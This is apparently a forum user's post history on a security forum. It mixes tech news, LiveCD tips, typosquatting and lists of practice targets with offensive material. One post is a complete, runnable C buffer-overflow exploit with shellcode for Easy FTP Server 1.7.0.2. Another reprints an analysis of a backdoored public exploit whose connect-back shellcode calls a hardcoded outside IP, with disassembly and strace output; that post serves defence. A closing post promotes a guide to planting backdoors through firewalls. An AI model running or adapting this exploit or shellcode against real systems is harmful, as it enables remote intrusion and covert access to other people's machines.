begood

Everything posted by begood

  1. sexy ^^ thanks.
  2. Install this: UNetbootin - Homepage and Downloads. Plug a formatted USB stick into the computer, choose the ISO image, and write it to the USB stick with that program. Reboot, select boot from the USB device (F8 while the computer is starting up); from there everything should work.
  3. You don't post things like that here.
  4. For a while I used to make LiveCDs with BartPE and create multiboot live USBs just for the fun ^^
  5. GeeXboX is a free embedded Linux distribution which aims at turning your computer into a so-called HTPC (Home Theater PC) or Media Center. Being a standalone LiveCD-based distribution, it's a ready-to-boot operating system that works on any Pentium-class x86 computer or PowerPC Macintosh, implying no software requirement. You can even use it on a diskless computer, the whole system being loaded in RAM. Despite its tiny ISO image size, the distribution comes with complete and automatic hardware detection, not requiring any driver to be added. It supports playback of nearly any kind of audio/video and image files, and all known codecs and containers are shipped in, allowing playing them through various physical supports, either being CD, DVD, HDD, LAN or Internet. GeeXboX also comes with a complete toolchain that allows developers to easily add extra packages and features, but that might also be used to give birth to many dedicated embedded Linux systems. GeeXboX HomePage
  6. kw3 can't hold his drink ... 2-3 months
  7. We visit dozens of websites every day; sometimes we are in a hurry to get to the website and try to quickly type in the URL in the browser address bar. At times, we make typographical mistakes such as character omission / replacement / insertion, adjacent character swap, singular / plural mistakes etc. Most of the time this is easy to detect: we get a "website not found" error and we recognize our mistake. But what if there was a website which corresponded to the typo? What if someone sets up an identical website there and you mistakenly type in your credentials? Welcome to the world of Typo-squatting, or URL Hijacking as it is called.

     In this video we look at a tool called Urlcrazy, using which we shall explore a sample case of Typo-squatting using Paypal. It is important to note that sometimes a typo could actually correspond to a legitimate website, but it is also important to be aware that it could be used for malicious purposes as well. Urlcrazy can be used by website admins to check the possible typos a person could most probably make while trying to get to their website. If there are sites corresponding to the typo, it would be a good idea to check them regularly to make sure that they are not being used for malicious purposes.

     video : Typosquatting and URL Hijacking using Urlcrazy Tutorial
     tool : http://rstcenter.com/forum/21687-urlcrazy-study-domainname-typos-url-hijacking.rst
  8. It generates domainname typo permutations then tests them to learn if they are in use, estimates their popularity and more.

     TYPES OF TYPOS SUPPORTED

     Character Omission. These typos are created by leaving out a letter of the domain name, one letter at a time. For example, www.goole.com and www.gogle.com

     Adjacent Character Swap. These typos are created by swapping the order of adjacent letters in the domain name. For example, www.googel.com and www.ogogle.com

     Adjacent Character Replacement. These typos are created by replacing each letter of the domain name with letters to the immediate left and right on the keyboard. For example, www.googke.com and www.goohle.com

     Adjacent Character Insertion. These typos are created by inserting letters to the immediate left and right on the keyboard of each letter. For example, www.googhle.com and www.goopgle.com

     Missing Dot. These typos are created by omitting a dot from the domainname. For example, wwwgoogle.com and www.googlecom

     Strip Dashes. These typos are created by omitting a dash from the domainname. For example, www.domain-name.com becomes www.domainname.com

     Singular or Pluralise. These typos are created by making a singular domain plural and vice versa. For example, www.google.com becomes www.googles.com and www.trademe.co.nz becomes www.trademes.co.nz

     DOMAIN TESTS

     Is the domain valid? UrlCrazy has a database of valid top level and second level domains. This information has been compiled from wikipedia and domain registrars. We know whether a domain is valid by checking if it matches toplevel and second level domains. For example, www.trademe.co.bz is a valid domain in Belize which allows any second level domain registrations but www.trademe.xo.nz isn't because xo.nz isn't an allowed second level domain in New Zealand.

     Popularity Estimate. We can estimate the relative popularity of a typo by measuring how often that typo has been made on webpages. Querying cuil.com for the number of search results for a typo gives us an indication of how popular a typo is. The drawback of this approach is that you need to manually identify and omit legitimate domains such as googles.com

     For example, consider the following typos for google.com.

     Quantity  Typo
     25424     gogle.com
     24031     googel.com
     22490     gooogle.com
     19172     googles.com
     19148     goole.com
     18855     googl.com
     17842     ggoogle.com
     16490     googe.com
     16367     googgle.com
     15029     google.cm
     14773     gogole.com
     13227     googlle.com
     11646     googlee.com
     11345     googlr.com
     7417      foogle.com
     6132      hoogle.com
     5313      googlw.com
     5208      giogle.com
     5151      googke.com
     4838      goigle.com
     4662      ogogle.com
     4630      gopgle.com
     4415      goofle.com
     4118      wwwgoogle.com
     3894      goohle.com
     3399      gooigle.com
     2675      gfoogle.com
     1942      googlecom.com
     1534      gopogle.com
     1356      googfle.com
     1089      googhle.com
     892       googlew.com
     747       googlke.com
     618       goiogle.com
     614       goopgle.com
     413       ghoogle.com
     341       goolge.com
     232       googler.com
     228       gpogle.com

     http://code.google.com/p/urlcrazy/
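The typo types listed above can be turned into a watch list for a domain you administer and matched against hostnames seen in your own proxy or DNS logs. This is an added example, not urlcrazy's code: the function names are hypothetical, "neighbour" is read as the adjacent key on the same QWERTY row, and the observed hostnames are constructed sample data.

```python
# Added example: typo watch list for a domain you own, built from the typo
# types described in the post. Not urlcrazy's implementation.
QWERTY_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm")

# Constructed sample of hostnames, as they might appear in proxy/DNS logs.
OBSERVED = ["www.google.com", "www.googel.com", "www.goohle.com",
            "www.example.org"]


def neighbours(ch):
    """Letters immediately left and right of ch on its QWERTY row."""
    for row in QWERTY_ROWS:
        i = row.find(ch)
        if i != -1:
            return [row[j] for j in (i - 1, i + 1) if 0 <= j < len(row)]
    return []  # digits, dashes and other characters have no neighbours here


def name_typos(name):
    """Map typo type -> set of mutated names (the label left of the suffix)."""
    n = len(name)
    return {
        "omission": {name[:i] + name[i + 1:] for i in range(n)},
        "adjacent_swap": {name[:i] + name[i + 1] + name[i] + name[i + 2:]
                          for i in range(n - 1) if name[i] != name[i + 1]},
        "replacement": {name[:i] + k + name[i + 1:]
                        for i in range(n) for k in neighbours(name[i])},
        "insertion": {name[:i + 1] + k + name[i + 1:]
                      for i in range(n) for k in neighbours(name[i])},
        "strip_dashes": {name[:i] + name[i + 1:]
                         for i in range(n) if name[i] == "-"},
        "plural": {name[:-1] if name.endswith("s") else name + "s"},
    }


def watchlist(name, suffix, prefix="www"):
    """Map each typo hostname to the sorted typo types that produce it."""
    host = f"{prefix}.{name}.{suffix}"
    hosts = {}
    for kind, names in name_typos(name).items():
        for typo in names:
            if typo:  # skip the empty label a one-letter name would give
                hosts.setdefault(f"{prefix}.{typo}.{suffix}", set()).add(kind)
    # Missing dot: drop one dot at a time from the full hostname.
    for i, ch in enumerate(host):
        if ch == ".":
            hosts.setdefault(host[:i] + host[i + 1:], set()).add("missing_dot")
    hosts.pop(host, None)  # never list the legitimate hostname itself
    return {h: sorted(kinds) for h, kinds in hosts.items()}


def flag_observed(observed, name, suffix):
    """Return the observed hostnames that are typo variants, with the type."""
    wl = watchlist(name, suffix)
    return {h: wl[h.lower()] for h in observed if h.lower() in wl}


if __name__ == "__main__":
    for host, kinds in flag_observed(OBSERVED, "google", "com").items():
        print(host, kinds)
```

As the post notes for googles.com, a match only means the hostname is a typo variant; whether the site behind it is legitimate still has to be checked by hand.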
  9. A new site dedicated to "building, managing, and researching professional reputations" that lets those in the work world comment on their bosses, colleagues and associates is creating controversy even before it's officially launched. Unvarnished.com, still in a test phase, hides the name of those commenting on a person, but the reviewer's identity is known to those who run the site, said Peter Kazanjy, one of the site's co-founders. He said only civil comments will be allowed, and that Unvarnished.com will offer a more realistic assessment of a person's strengths and weaknesses than a professional networking site such as LinkedIn. Unvarnished - Community-contributed reviews for business professionals source msnbc.msn.com
  10. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> //************************************************************************* // Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit // ( 11470_x90c.c ) // // Date: 24/03/2010 // Author: x90c < x90c.org > // // Discovered by: loneferret // // Exploits by: // [1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 ) // - http://www.exploit-db.com/exploits/11470 // [2] 11470_x90c.c ( Exploit ) // ( MAGIC RET, Metasploit shellcode ) //************************************************************************* // Metasploit shellcode ( calc.exe ) - 228 Bytes static char shellcode[] = { "\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" "\x1b\x35\x1d" }; int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in sa; char rbuf[128]; char x0x[278]; int i = 0, j = 0; int port = 0; int err = 0; printf("\n\n***********************************************\n"); printf("* Easy FTP Server 1.7.0.2 MKD Remote BoF *\n"); printf("* Found by: loneferret *\n"); printf("* - 
http://www.exploit-db.com/exploits/11470 *\n"); printf("* - 11470_x90c.c - x90c *\n"); printf("***************************************************\n\n"); if( argc < 3 ) { printf("Usage: %s <Target IP> <Port>\n\n", argv[0]); exit(1); } port = atoi(argv[2]); if(port <= 0 || port > 65535) { port = 21; } printf("[PORT] %d/tcp\n", port); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr(argv[1]); sa.sin_port = htons(port); if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { err = -1; fprintf(stderr, "[!] Socket failed\n"); goto out; } // Socket Connect if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1) { err = -2; fprintf(stderr, "[!] Connection failed!\n"); goto out; } printf("[+] Connected!\n"); // Auth recv(sockfd, rbuf, sizeof(rbuf), 0); send(sockfd, "USER anonymous\r\n", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "okay") != NULL) printf("[USER] anonymous\n"); send(sockfd, "PASS anonymous\r\n", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "logged in.") != NULL) printf("[PASS] anonymous\n"); // Fill Payload memset(&x0x, 0x90, sizeof(x0x)); for(i = 20, j = 0; j < strlen(shellcode); j++) x0x[i++] = shellcode[j]; x0x[0] = 'M'; x0x[1] = 'K'; x0x[2] = 'D'; x0x[3] = ' '; // MAGIC RET: // # CALL EBP ( EBP Register points to nopsled of this payload when overflowed ) // # 004041EC FFD5 |CALL EBP // # // x0x[272] = '\xEC'; x0x[273] = '\x41'; x0x[274] = '\x40'; x0x[275] = '\x00'; x0x[276] = '\r'; x0x[277] = '\n'; x0x[278] = '\x00'; printf("[+] Sending payload...\n"); // Send payload send(sockfd, x0x, 278, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL)) { printf("[!] anonymous account doesn't have permission to MKD command...\n"); printf("[!] Exploit Failed. ;-x\n"); goto out; } printf("[+] Exploited \n"); out: close(sockfd); return err; }
  11. BadFoo md5 : 1b1f37ed6b6f958cde0529a8a1f06637
  12. This afternoon a question came up on the #metasploit IRC channel (irc.freenode.net). The questioner asked: "Should a good penetration tester know assembly?". This led to some discussion about when and where assembly language skills become important in the scope of a penetration test.

      My normal response to "Should I learn [something]?" questions is always a resounding YES; it is hard to know too much as a penetration tester or system auditor. Little things, like knowledge of beginner mistakes in configuration files, can go a long way to a successful penetration test. In the case of assembly, it helps, just like everything else does, but it's not always required or even used frequently. Assembly language programming is mandatory for developing your own exploits and for tweaking others, but for the most part, it is not the defining factor in whether you will gain access to a network.

      There is one critical task where deep knowledge of assembly (and C) is required: validating public exploits. Over the years, dozens of fake exploits have been released; some of these delete all of the files from the drive, while others install a persistent backdoor. There is one other class of backdoored exploits that you rarely hear about, but are still found on public exploit repositories. These exploits look correct, function correctly, but also provide the exploit author with access to the system you exploited. The tricky thing about these exploits is that to find the backdoor, you have to decode and understand the shellcode, which is invariably written in assembly language.

      Let's go through a real-life example. In 2001, Gustavo Scotti of Tamandua Laboratories (now Axur Information Security) released an exploit for the BIND TSIG buffer overflow vulnerability published by Network Associates (now McAfee). This exploit, named tsl_bind.c, can still be found on a number of exploit repositories, including PacketStorm.
      This exploit looks and works as advertised, except for one tiny thing. Let's take a closer look at the Linux shellcode in this exploit:

          /* SHELLCODE - this is a connect back shellcode */
          u8 shellcode[]=
          "\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46"
          "\x04\x97\xc4\x47\xa0\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89"
          "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
          "\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90"
          "\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59"
          "\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46"
          "\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86"
          "\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06"
          "\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0"
          "\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62"
          "\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46"
          "\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
          "\xcd\x80\x31\xc0\x40\xcd\x80";

      Nothing too sinister jumps out at first glance, but let's actually look at the instructions:

          00000000  3C90              cmp al,0x90
          00000002  89E6              mov esi,esp
          00000004  83C640            add esi,byte +0x40
          00000007  C70602000BAC      mov dword [esi],0xac0b0002
          0000000D  C7460497C447A0    mov dword [esi+0x4],0xa047c497
          00000014  31C0              xor eax,eax
          [snip]
          00000058  7432              jz 0x8c
          0000005A  8B0424            mov eax,[esp]
          0000005D  894608            mov [esi+0x8],eax
          00000060  90                nop
          00000061  BD7F000001        mov ebp,0x100007f
          00000066  896E04            mov [esi+0x4],ebp
          00000069  C70603803586      mov dword [esi],0x86358003
          0000006F  B804000000        mov eax,0x4

      In the code above (see here for a full listing), we can see that there are actually TWO reverse connections. One which goes to 151.196.71.160 (0x97c447a0) and another that goes to 127.0.0.1 (0x7f000001). The 127.0.0.1 address is substituted when the exploit is run, but the first address is not.
      In essence, every time this exploit succeeds, it will provide you with a shell, but also connects back to the author's IP address and sends a blob of information about the user running the exploit. If you pipe the shellcode into Metasploit's msfencode, you can see it in action:

          $ msfencode -e generic/none -a x86 -p linux -t elf -o tsl.bin < shellcode.raw
          $ chmod +x ./tsl.bin
          $ strace -f -qix ./tsl.bin
          [ Process PID=15282 runs in 32 bit mode. ]
          socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
          connect(3, {sa_family=AF_INET, sin_port=htons(2988), sin_addr=inet_addr("151.196.71.160")}, 16
          write(3, "\3\2005\206\177\0\0\1\1\0\0\0", 12) = 12
          socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
          connect(4, {sa_family=AF_INET, sin_port=htons(2987), sin_addr=inet_addr("127.0.0.1")}, 16) = 4
          dup2(4, 0) = 0
          dup2(4, 1) = 1
          execve("/bin/sh",...)= 0

      To add insult to injury, the backdoor IP gets the shell connection first!

      In summary, if you are using exploits from public repositories for your penetration testing engagements, you do need to learn assembly code. Intel x86 is a must, but also any other architecture you happen to test (PowerPC, SPARC, ARM, etc).

      This is another reason to prefer the Metasploit Framework over an unvetted public exploit. Every single exploit, encoder, nop generator, and payload in Metasploit has been reviewed by a member of the core team. A side effect of us converting public exploits into Metasploit modules is the review and analysis process. Public code is first broken down into the transport, vector, return address, and payload components, and each piece is then reimplemented using the Metasploit API. This process leads to reliable exploit code that doesn't depend on a specific payload or transport.

      Update: A few folks have asked about getting started guides for x86 assembly. The resource I find useful is the tutorial section of Linux Assembly project.
Once you have the basics down, take a look through the shellcode directory of the Metasploit Framework and study up with the NASM Manual. Update: In addition to the comments below, the Programming From the Ground Up book was recommended, as well as the ASM Community web site. Update: Based on gscotti's comments below (the original author), I clarified the post to indicate that only a reverse connect is made, not an actual shell. His comment states that over 30,000 IPs connected back since he released it. hdmoore @ blog.metasploit.com
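The review step described in the post above, finding where a payload connects without running it, can be partly automated for this shellcode's idiom. This is an added example, not code from the original post or from Metasploit: it pattern-matches the `mov dword [esi], 0x....0002` sockaddr_in stores seen in the listing rather than disassembling, so it is a triage aid and not a substitute for reading the instructions; the function names are hypothetical and the byte excerpt is assembled from bytes shown in the post.

```python
# Added example: static triage of connect-back shellcode for hardcoded
# sockaddr_in targets, using the instruction idiom from the listing above.
import ipaddress
import re

# Constructed excerpt, built only from bytes shown in the post (not the full
# payload): offsets 0x00-0x15 and 0x61-0x6e of the disassembly, the second
# sockaddr store, and the "/sh\0" store as a decoy that must not be reported.
EXCERPT = bytes.fromhex(
    "3c90" "89e6" "83c640" "c70602000bac" "c7460497c447a0" "31c0"
    "bd7f000001" "896e04" "c70603803586"
    "c70602000bab" "896e04"
    "c746042f736800"
)

# mov dword [esi], imm32 whose first two bytes in memory are 02 00
# (sin_family = AF_INET), followed by the port in network byte order.
AF_INET_STORE = re.compile(rb"\xc7\x06\x02\x00(..)", re.S)


def find_connect_targets(code):
    """Return (offset, ip, port) for each sockaddr_in built at [esi]."""
    targets = []
    for m in AF_INET_STORE.finditer(code):
        port = int.from_bytes(m.group(1), "big")
        nxt = code[m.end():m.end() + 7]
        addr = None
        if len(nxt) == 7 and nxt[:3] == b"\xc7\x46\x04":
            # mov dword [esi+4], imm32: address stored directly
            addr = nxt[3:7]
        elif len(nxt) >= 3 and nxt[0] == 0x89 and nxt[2] == 0x04 \
                and nxt[1] & 0xC7 == 0x46:
            # mov [esi+4], reg: find the last "mov reg, imm32" before it
            reg = (nxt[1] >> 3) & 7
            load = code.rfind(bytes([0xB8 + reg]), 0, m.start())
            if load != -1 and load + 5 <= m.start():
                addr = code[load + 1:load + 5]
        if addr is not None:
            targets.append((m.start(), str(ipaddress.IPv4Address(addr)), port))
    return targets


def unexpected_targets(code, allowed=()):
    """Targets that are neither loopback placeholders nor explicitly allowed."""
    return [(ip, port) for _, ip, port in find_connect_targets(code)
            if not ipaddress.IPv4Address(ip).is_loopback and ip not in allowed]


if __name__ == "__main__":
    for offset, ip, port in find_connect_targets(EXCERPT):
        print(f"0x{offset:02x}: {ip}:{port}")
    print("needs explanation:", unexpected_targets(EXCERPT))
```

On the excerpt this reports the same two endpoints the strace output shows, and only the non-loopback one is flagged as needing an explanation before the exploit is trusted.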
  13. Want to know how "Clash of the Titans" will fare at the box office this weekend? Check Twitter. So say two Silicon Valley researchers who claim they have discovered a way to use the popular social media service to gauge real-time interest in movies and accurately predict how they will perform at the box office on opening weekend. Sitaram Asur and Bernardo Huberman, two social computing scientists at HP Labs in Palo Alto, Calif., contend that computational methods using Twitter feeds can predict with as much as 97.3 percent accuracy how a movie will perform its first weekend of release. That far surpasses the traditional survey-based "tracking" reports that studios have long relied upon to forecast movie ticket sales, or the popular online site Hollywood Stock Exchange that lets users wager box office predictions with pretend money. The computer models based on Twitter chatter could signal a Merlin-like tool for Hollywood, which has long struggled to come up with fail-safe ways to figure out how movies will do at the box office. Among other things, the research could help studios decide whether to make last-minute tweaks to advertising campaigns, or scale back and cut their losses. Although the studios can often predict some weekend box-office results within 10 percent, their results can fall short on films that target kids or teen fan boys, or are outliers like the recent Oscar winner, "The Blind Side." The researchers used the rate at which movies are mentioned in Twitter updates to predict first-weekend box-office returns. The sentiment of the tweets -- positive, neutral or negative -- also accurately predicted second weekend, they said. The research comes as movies' performance in the nearly $11 billion box-office market, once of concern only to Hollywood insiders, has become a national pastime. 
It also comes as two trading firms, a Wall Street player and a Midwest upstart, are trying to roll out futures exchanges that they say are designed to help studios hedge box-office performance. Huberman said the research shows that Twitter could be tapped to predict the outcome of all sorts of things, including how well major new products will be received and the outcome of major political races. That could capture the elusive commercial potential of social media, that services like Twitter with their vast flow of real-time information have the power and reach to track people's interests. Twitter, which has yet to demonstrate how it will translate its huge popularity into profits, will unveil a new advertising platform this month. Hollywood has aggressively tapped social media as it becomes more important in influencing movie-going decisions. "There's a lot of science that goes into this stuff even in red-neck Hollywood," said veteran Hollywood marketer Gordon Paddison. Paddison released a report last fall that studied how 4,000 moviegoers use online resources to make their ticket-buying decisions. He found that while critics have little sway, social-media recommendations do. Twitter and other social media services are more valuable to Hollywood in influencing sentiment than in predicting it, Paddison said. Twitter's influence is also limited because its audience trends younger and hipper, without tapping other groups that drive a film's popularity. "Are there enough hardcore Christians on Twitter to predict that the 'Passion of the Christ' will be a $400 million film?" Paddison asked. "If so, then studios would be highly interested." Hollywood studios spend millions annually on marketing research, including test screenings (where invited audiences, shown films often months before their premieres, not only give the movies numerical scores but also say what scenes and characters they did and didn't like) and telephone and online surveys. 
The latter data, which is compiled and reported by several different firms, can give studios insight into what segments of an audience are interested in a given film, and a usually reliable estimate of how well the film may or may not in its premiere weekend. While these so-called tracking surveys are sometimes far off the mark, particularly for movies catering to children and teenage fan boys, they most often carry a margin of error of about 10 percent. Whether social media can deliver returns at the box office remains to be seen. "Twitter is a reflection of what people are talking about," said one studio marketing head, who was unacquainted with the HP Labs researchers' claims and requested anonymity. "Nobody has figured out how to harness it yet, and the tools that exist to monitor it so far seem wonky and unreliable." The HP Labs study analyzed nearly 3 million Twitter updates that mentioned 24 major releases -- "Alice in Wonderland," "Avatar" and "Twilight: New Moon" -- over the course of three months. By factoring in the date of a movie's release and the number of theaters where it appeared, the researchers predicted opening weekend box-office performance with 97.3 percent accuracy. They developed a system to evaluate the sentiment of Twitter updates -- positive, neutral or negative -- to predict the following weekend's returns with 94 percent accuracy. For example: The researchers' Twitter-based methodology predicted "Dear John" would garner $30.71 million at the box office on opening weekend. It pulled in $30.46 million. And for "The Crazies," the methodology predicted $16.8 million, and it earned $16.07 million on opening weekend. The researchers are applying for a patent for the methodology they used. They say don't have any plans yet to commercialize it, but are presenting their findings at Web intelligence conference in Toronto in August. physorg
  14. Apple's iPad has already been jailbroken, using a variation of the iPhone method and demonstrating just how much the two devices have in common. The hack was completed in less than 24 hours. In theory it enables the owner to install everything from Wi-Fi scanners to pornography - applications Apple disapproves of - though for the moment it just allows a remote terminal connection. The hack potentially even allows Palm OS applications to run on the iPad, thanks to jailbreaking. But amidst all this excitement over the hack, it seems few iPad customers are rushing out to buy newspaper subscriptions. PaidContent reports that the newspaper and magazine subscriptions through which the iPad was supposed to change the world, are curiously absent from the lists of most popular paid applications. That could be bad news for the media, but we suspect it's attributable to the early adopters being used to getting stuff for free, so we'll withhold judgement until Cupertino ships a few more pads. Apple reckons it's already shipped 300,000 iPads, but that includes stocking shops and it would be interesting to know how many are still knocking around on the shelves. Gizmodo wandered around some local Apple stores and was surprised to find them well stocked for the revolution, so if you've not got your iPad yet (and happen to be in America) then you should be able to pick one up easily enough. But the kind of buyers interested in newspaper subscriptions won't be buying an iPad in the first week. They'll be waiting to see how it develops, unlike the early adopters rushing to jailbreak the device as a techie's toy. It will be a while before we can say if Apple really has created a new computing paradigm. theregister
  15. Academic papers, reports, essays, books and articles regarding hackers, the process of hacking, and the social aspects of the entire archetype. I've tried to be all-inclusive, and make this collection more browsable with quick summaries of what each paper contains. Hacker: Academic and Popular Writings
  16. Welcome.
  17. begood

    test..

    Buddy, nothing works, you can keep trying whatever the hell you want. You might get a warn for trying to find a vulnerability in the forum.
  18. Need to catch up on your reading? Like, a whole damn lot of reading? A new iPhone app offers 746 free public domain scifi books from authors such as Jules Verne, Edgar Rice Burroughs, and H.G. Wells. App designers Spreadsong have aggregated hundreds of classic and pulp works from the architects of modern science fiction, all for the price of a sunbeam. Spreadsong touts the app as a 100% free smorgasbord of classic literature. What a rad idea! I could see this being very handy for research papers, authors searching for literary allusions, or League of Extraordinary Gentlemen completists who must absolutely track down every eensy-weensy reference*. *I'd be remiss if I didn't mention you can already read Jess Nevins' mind-bogglingly detailed League annotations online. via itunes // besides these I also recommend http://www.feedbooks.com/
  19. Just a quick post. Someone on the ‘NULL’ mailing asked for WebGoat alternatives to learning Web Application penetration testing. The response was amazing, with many applications being listed as vulnerable web applications designed for learning web-app pentest. I have collected all vulnerable web applications and listed them below for reference:

      1. SPI Dynamics (live) – http://zero.webappsecurity.com/
      2. Cenzic (live) – http://crackme.cenzic.com/
      3. Watchfire (live) – http://demo.testfire.net/
      4. Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
      5. PCTechtips Challenge (live) - http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
      6. Damn Vulnerable Web Application – http://dvwa.co.uk/
      7. Mutillidae – http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
      8. The Butterfly Security Project – http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project/
      9. Hacme Casino – http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
      10. Hacme Bank 2.0 – http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
      11. Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
      12. Hacme Books – http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
      13. Hacme Travel – http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
      14. Hacme Shipping - http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
      15. OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project
      16. OWASP Vicnum – http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
      17. OWASP InsecureWebApp – http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
      18. OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
      19. Moth - http://www.bonsai-sec.com/en/research/moth.php
      20. Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
      21. SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
      22. BadStore – http://www.badstore.net/
      23. WebMaven/Buggy Bank – http://www.mavensecurity.com/webmaven (very old)
      24. Exploit-DB – http://www.exploit-db.com/webapps (some vulnerable web applications are provided as downloads)

      securitythoughts.wordpress.com
  20. Google has purchased Episodic, a San Francisco-based startup offering a platform for delivering live and on-demand video via the web. Episodic trumpeted the deal on Friday with a post to its blog. The startup says that in joining Google, it will continue its work to deliver video to desktops and notebooks, mobiles, and IPTV devices and that there will be no interruption in service for existing Episodic customers. New account sign-ups, however, have been suspended. "From our earliest discussions with Google, it was clear that the teams shared this belief and together we obviously see huge potential in online video," the post reads. "Our product visions were also complementary and together we will continue to produce innovative video technology for our customers and their viewers." The company's platform lets businesses - including content creators, marketers, and enterprises - host, stream, measure, and, yes, monetize their videos. Monetization is done via advertising as well as online credit-card sales. The platform could dovetail with YouTube, but it's also worth noting that Episodic mentions IPTV devices. Multiple reports have indicated that Google is developing a television set-top box that - among other things - delivers web video. Terms of the deal were not disclosed. theregister.co.uk
  21. în cur la mâ?.
  22. meh, I sent a tip to TorrentFreak about the potential use of the "method" in BitTorrent. Let's see what comes of it.
  23. ----[ Introduction

      This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system. Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does its job and is not easily detectable. The kind of backdoor needed depends on the firewall architecture used. As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.

      more : Placing Backdoors Through Firewalls